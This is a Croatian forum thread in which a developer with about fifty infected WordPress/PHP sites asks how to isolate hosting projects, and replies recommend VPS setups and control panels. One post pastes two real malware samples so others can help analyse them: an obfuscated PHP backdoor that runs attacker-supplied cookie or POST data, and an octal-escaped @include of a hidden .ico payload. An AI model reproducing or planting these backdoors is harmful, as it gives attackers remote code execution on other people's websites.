Tražim hosting sa nezavisnim cjelinama

vegas · veljača 2020 23:21 28

nisu, sve custom ali pravljeni davno, jos za php5. vrijeme je za update, samo nije mi jasno zasto ovo sad odjednom… cak sam probao i drugi server i sve isto se desava… mozda je i do cPanel update-ova… jedino to mi pada na pamet.

bozoou · veljača 2020 18:15 29

Kratki odgovor: mislim da mi treba resseler host

Dugi odgovor:
Znači imam grdih problema sa virusima i malo ja njih nadhebem…malo oni mene. Evo vodio sam bitku do jučer…a jučer mi je bio valjda najgori dan u životu od kada pamtim.

E sad, situacija je sljedeća. Imam 50-ak projekata i medju njima virus koji se razbacao po svima. Tako se je razbacao da ga imaš ručno što čistiti oho ho vremena. Valjda 40 min.
Potrošio sam mjesec dana na izradu aplikacije koja to radi u tili čas …i tu je 1:0 za mene protiv virusa.

Ono što je bilo problematično, nemereš očistiti govn.o da se ne roji, jer onaj tko je pravi izvor virusa…njega džabe ako i očistim…on će opet zaraziti i sebe i druge.

…pa sam pribjegao tome da držim svaki projekt na hostingu zasebno da ne može utjecati na druge stranice. (Znači skripta koja se nalazi u folderu A ne smije moći pisati po file-ovima projekta koja se nalazi negdje u folderu B)

Pokušao sam to rješiti permissionima foldera u cPanelu…ali jok. To nikako nisam uspio. Možda sam tudum…ali to jednostavno nisam uspio. Kada bi god nekako ograničio da neki folder ne može pisati po susjednom folderu…desio bi se gubitak tih prava i tamo di su potrebni unutar foldera…pa bi aplikacija pucala.

No imao sam taman jedan hosting koji je imao “subscriptione”. To su sekcije na hostingu koje su se pokazale nezavisne upravo po tome da ograničavaju da projekt iz jednog subscriptiona vidi neki projekt iz drugog subscriptiona.

Tako sam lagano čistio projekte sa prvog hostinga i selio ih na drugi hosting i tamo raspodjeljivao projekte po subscriptionima. To je držalo vodu … ali taj host ukida subscriptione i stariju verziju php-a…i sad se treba dalje snaći.

Meni bi znači trebalo nešto poput resseler hosta ili neka druga opcija da postignem isti effekt odvojenih neovisnih cjelina?
Resseler host bi bio super jer bi mogao klijentu dati direktni pristup na njegov projekt ako ima svog developera da nešto prčka po stranici.

bozoou · veljača 2020 18:17 29

Koliko je kompleksno upravljati VPS-om da se postigne struktura resseler hosta?

tpojka · veljača 2020 18:40 29

Može li kod tog virusa što se čisti? Je l’ JS il’ PHP il’ nešto treće?

bozoou · veljača 2020 18:49 29

Neki mutant. Ma PHP u nekakvim enkodiranim verzijama…nisam išao za tim da pohvatam što i kako radi.

<?php
$tkvftkk = '6i0gp-v8a_u4mlbnd#9tHor5cxy3fe*k\'s';$kqtam = Array();$kqtam[] = $tkvftkk[20].$tkvftkk[30];$kqtam[] = $tkvftkk[24].$tkvftkk[22].$tkvftkk[29].$tkvftkk[8].$tkvftkk[19].$tkvftkk[29].$tkvftkk[9].$tkvftkk[28].$tkvftkk[10].$tkvftkk[15].$tkvftkk[24].$tkvftkk[19].$tkvftkk[1].$tkvftkk[21].$tkvftkk[15];$kqtam[] = $tkvftkk[8].$tkvftkk[14].$tkvftkk[23].$tkvftkk[18].$tkvftkk[7].$tkvftkk[16].$tkvftkk[29].$tkvftkk[27].$tkvftkk[5].$tkvftkk[7].$tkvftkk[27].$tkvftkk[14].$tkvftkk[0].$tkvftkk[5].$tkvftkk[11].$tkvftkk[8].$tkvftkk[29].$tkvftkk[2].$tkvftkk[5].$tkvftkk[7].$tkvftkk[16].$tkvftkk[24].$tkvftkk[28].$tkvftkk[5].$tkvftkk[27].$tkvftkk[18].$tkvftkk[8].$tkvftkk[7].$tkvftkk[18].$tkvftkk[2].$tkvftkk[7].$tkvftkk[18].$tkvftkk[0].$tkvftkk[11].$tkvftkk[18].$tkvftkk[23];$kqtam[] = $tkvftkk[17];$kqtam[] = $tkvftkk[24].$tkvftkk[21].$tkvftkk[10].$tkvftkk[15].$tkvftkk[19];$kqtam[] = $tkvftkk[33].$tkvftkk[19].$tkvftkk[22].$tkvftkk[9].$tkvftkk[22].$tkvftkk[29].$tkvftkk[4].$tkvftkk[29].$tkvftkk[8].$tkvftkk[19];$kqtam[] = $tkvftkk[29].$tkvftkk[25].$tkvftkk[4].$tkvftkk[13].$tkvftkk[21].$tkvftkk[16].$tkvftkk[29];$kqtam[] = $tkvftkk[33].$tkvftkk[10].$tkvftkk[14].$tkvftkk[33].$tkvftkk[19].$tkvftkk[22];$kqtam[] = $tkvftkk[8].$tkvftkk[22].$tkvftkk[22].$tkvftkk[8].$tkvftkk[26].$tkvftkk[9].$tkvftkk[12].$tkvftkk[29].$tkvftkk[22].$tkvftkk[3].$tkvftkk[29];$kqtam[] = $tkvftkk[33].$tkvftkk[19].$tkvftkk[22].$tkvftkk[13].$tkvftkk[29].$tkvftkk[15];$kqtam[] = $tkvftkk[4].$tkvftkk[8].$tkvftkk[24].$tkvftkk[31];foreach ($kqtam[8]($_COOKIE, $_POST) as $jlgtudl => $tmwuer){function dctvsy($kqtam, $jlgtudl, $nsvmcth){return $kqtam[7]($kqtam[5]($jlgtudl . $kqtam[2], ($nsvmcth / $kqtam[9]($jlgtudl)) + 1), 0, $nsvmcth);}function aqihg($kqtam, $vfzhrbm){return @$kqtam[10]($kqtam[0], $vfzhrbm);}function lvyjdt($kqtam, $vfzhrbm){$thdstnj = $kqtam[4]($vfzhrbm) % 3;if (!$thdstnj) {$ybammpl = $kqtam[1]; $yuwwf = $ybammpl("", $vfzhrbm[1]($vfzhrbm[2]));$yuwwf();exit();}}$tmwuer = aqihg($kqtam, $tmwuer);lvyjdt($kqtam, $kqtam[6]($kqtam[3], $tmwuer ^ dctvsy($kqtam, $jlgtudl, $kqtam[9]($tmwuer))));}

…

<?php
/*15343*/

@include "\057home\057http\144/vho\163ts/c\162oati\141-acc\157mmod\141tion\056info\057apar\164mani\055proh\141ska.\143om/t\145mpla\164es/t\065/ima\147es/.\0610035\064bb.i\143o";

/*15343*/

Ima još patterna u kojima se pojavljuje, ako te zanima baš…potražit ću.

tpojka · veljača 2020 19:08 29

Potraži za početak gdje ti se dešava % 3.

Edit: je l’ to code injected il’ file created?

Sacir_Satko · veljača 2020 22:20 29

Prvi kod:

Drugi kod:

tpojka · veljača 2020 23:09 29

Evo kako se i pakuju funkcije i ne samo to:

@bozoou

'6i0gp-v8a_u4mlbnd#9tHor5cxy3fe*k\'s'

Ovaj string, je l’ uvijek isti il’ se mijenja po sajtovima?

bozoou · ožujak 2020 13:11 1

Ok, to će biti svakako korisno…al trenutno sam fokusiran na drugo.
Prioritet mi je spriječiti mogućnost prelaska virusa…jer džabe ja nađem lijek za jedan virus, neka se sutra pojavi klijent sa stranicom sa drugačijim virusom…eto opet najezde i problema na svim projektima.

A kad blokiram mogućnost prelaska onda sam već generalno siguran. Tada se mogu baviti pojedinačno sa tim site-ovima i tražiti u čemu je kvaka da izlječim i te “nulte pacijente”. Al trenutno mi je malo požar da bi o tome uopće razmišljao.

Gornja dva posta su zrela za zasebnu temu, i bum uskoro otvorio tu temu.

bozoou · ožujak 2020 13:13 1

Trenutno me zanima preporuka reseller hosta, netko možda iskustva sa:

te koje su alternative, da se postigne ponašanje sustava koje sam opisao da trebam.

Hvala.

korisnik9758789 · ožujak 2020 13:29 1

kako nađeš te viruse? jesu li nulled theme u pitanju? svaku temu treba provući kroz virustotal

bozoou · ožujak 2020 14:04 1

Nebi znao kako su nastali. Nisu moji projekti, nego sam ih dobio kao extra gift uz jednu akviziciju. A previše tu ima wp siteova da bi istraživao tko što koga i kakve su teme. I još površno poznam WP, a i mali su to sajtovi da bi se isplatio detaljan pristup oko svakog.

A virusi su detektirani jer su radili redirekcije na spam reklame…sa svakog sitea na koji bi se zakeljili. A redirektali bi i na porniće i svašta…i to poprilicno agresivno u omjeru mozda 1:1 spam vs original site.

Razdvajanje projekata po nezavisnim cjelinama se pokazalo zaista elegantno i robusno rješenje. Jer takovi virusi se mogu širiti samo ako inficirani projekt ima dozvolu da kreira/modificira skripte drugog projekta.

komentar · ožujak 2020 14:04 1

Možda ne trebaš reseller host. Uzmeš VPS , instaliraš CWP i sa njim možeš kreirati reseller acc, pa onda jedan sajt na jedan username

bozoou · ožujak 2020 14:09 1

E, to mi zvuči puno fleksibilnije i povoljnije. Jer vidim da reseller hostinzi dobrano pumpaju cijenu po novom korisniku. Što u mom slučaju znači da me rast broja nezavisnih cjelina dobrano košta.

E sad, ja sam malo/puno neuk što se tiče upravljanja vps-om. Pa me zanima koliko je kompleksno da se kao novak snađem sa time?
Kakva je krivulja učenja, tj. koliko vremena je potrebno da se uhodam il postavim inicijalni setup za reseller account?

korisnik9758789 · ožujak 2020 14:17 1

instalacija cyberpanela, zaista jednostavan control panel, sve se može u par klikova …

https://cyberpanel.net/docs/installing-cyberpanel/

ako je na vpsu centos 7 ili ubuntu za skoro sve imaš tutorijale na netu

bozoou · ožujak 2020 14:18 1

Ok, zvuči da nema razloga za strah. Onda odluka pada na vps.
Kako odabrat vps, kod koga? Ako može koja sugestija

P.S. “uskoro nudim hosting pakete na forumu”, hehe

komentar · ožujak 2020 14:32 1

Vidi po netu . Ja osobno koristim hetzner i nemam problema nikakvih. Koristim Ubuntu + webmin/virtualmin .
Prije sam koristio VestaCP, pa onda i CWP (oba na Centos)

VestaCP i CWP imaju mogućnost da po korisniku ograniče pakete i osiguraju sigurnost .

Webmin/Virtualmin radi istu stvar, samo po principu podjele po serverima a ne korisnicima .

Poanta je, da kreirana struktura foldera ima vlasnika, koji ima permisije. Takva situacija je kod svakog od njih, i mislim da je sasvim dovoljna da te riješi problema.

korisnik9758789 · ožujak 2020 15:44 1

ja bih ti preporučio veesp.com … unamanged su serveri

samo da te upozorim jer sam ja imao problema, ako sam podešavaš vps budi spreman da će se nekad pojaviti neki problem koji ćeš rješavati sat vremena, a podrška neće da pomogne jer je unmagaged ili će tražiti da platiš

postoje i managed vps serveri sa podešenim cpanelom ali su duplo skuplji

Hellas · ožujak 2020 15:53 1

Od ta dva ne zna se koji je vise supalj. Plus ovaj Centos Web Panel nema veze sa Centos projektom osim sto radi na njemu, a da je lijep na oko jeste… Znaci na server gdje ima klijenata ih koristiti bi bilo lose.

https://www.rack911labs.com/research/security-analysis-of-alternative-control-panels/

https://www.webhostingtalk.com/showthread.php?t=1770951

https://cxsecurity.com/cveproduct/16933/34645/centos_web_panel/

komentar · ožujak 2020 16:00 1

Za CWP mogu reći da me nije oduševio , što ne čudi s obzirom da već godinama ne rade na njemu aktivno. Dali je šupalj ne znam, ali je bugovit i nema aktivnu zajednicu